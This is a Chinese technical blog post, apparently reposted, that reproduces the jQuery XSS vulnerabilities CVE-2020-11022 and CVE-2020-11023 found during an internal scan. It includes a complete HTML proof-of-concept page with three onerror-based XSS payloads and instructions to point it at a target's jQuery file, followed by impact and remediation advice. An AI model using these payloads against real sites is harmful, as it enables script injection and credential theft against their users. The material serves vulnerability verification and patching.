热门标签
热门文章
- 1IDEA中连接Redis集群时抛出异常:CLUSTERDOWN Hash slot not served 的问题解决_redis.clients.jedis.exceptions.jedisclusterexcepti
- 2华为云配置安全组策略开放端口_华为云端口
- 3Go语言金融领域常用加密算法02国密SM4算法_golang sm4
- 4XILINX偶然加载不成功的问题原因及解决方法_fpga加载不起来的原因
- 5c语言图像均值,opencv利用视频的前n帧求平均图像
- 6嵌入式学习——3——UDP TFTP简易文件传输
- 7sparksql代码执行过于缓慢_warn jdbcutils: requested isolation level 1 is not
- 8【PCIE】DMA读写速度测试----Linux系统
- 9【javaSE】抽象类和接口(2)(接口部分)
- 10vue列表-查询筛选功能_vue表单查询
当前位置: article > 正文
【JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】_jquery 存在 xss 漏洞
作者:weixin_40725706 | 2024-06-09 21:34:50
赞
踩
jquery 存在 xss 漏洞
一、漏洞描述
进行在公司内部用nessus做漏洞扫描时,发现某台服务器报出这个中危漏洞,后面查资料复现。
根据脚本中的自我报告版本,远程web服务器上托管的JQuery版本大于或等于1.2,且在3.5.0之前。因此,它受到多个跨站点脚本漏洞的影响。
二、受影响版本
JQuery版本大于等于1.2 ,小于 3.5.0
三、漏洞复现
1、首先根据漏洞提示访问到了如下界面
http://x.x.x.x/Scripts/jquery-1.7.1.min.js
- 1
2、利用POC复现
利用源代码如下:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title> <!-- 测试JQuery --> <script src="http://x.x.x.x/Scripts/jquery-1.7.1.min.js"></script> <!-- <script src="./jquery.min.js"></script> --> </head> <body> <script> function test(n,jq){ sanitizedHTML = document.getElementById('poc'+n).innerHTML; if(jq){ $('#div').html(sanitizedHTML); }else{ div.innerHTML=sanitizedHTML; } } </script> <h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1> <p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p> <h2>PoC 1</h2> <button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button> <xmp id="poc1"> <style><style /><img src=x onerror=alert(2)> </xmp> <h2>PoC 2 (Only jQuery 3.x affected)</h2> <button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button> <xmp id="poc2"> <img alt="<x" title="/><img src=x onerror=alert("1st")>"> </xmp> <h2>PoC 3</h2> <button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button> <xmp id="poc3"> <option><style></option></select><img src=x onerror=alert("1st")></style> </xmp> <div id="div"></div> </body> </html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
在src处替换为目标路径地址即可,打开html
点击Append via .html(),可弹窗说明漏洞存在
四、漏洞危害
攻击者可以利用该漏洞执行恶意HTML/JS代码、构造蠕虫、篡改页面实施钓鱼攻击、以及诱导用户再次登录,然后获取其登录凭证等。
五、修复建议
(1)更新 jQuery 到 3.5.0 或更高版本
(2)关闭不必要的目录访问权限,如Scripts目录,仅开放提供服务的目录
(3)过滤输入的数据,对例如:“ ‘ ”,“ “ ”,” < “,” > “,” on* “,script、iframe等危险字符进行严格的检查。这里的输入不仅仅是用户可以直接交互的输入接口,也包括HTTP请求中的Cookie中的变量,HTTP请求头部中的变量等。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/695864
推荐阅读
相关标签
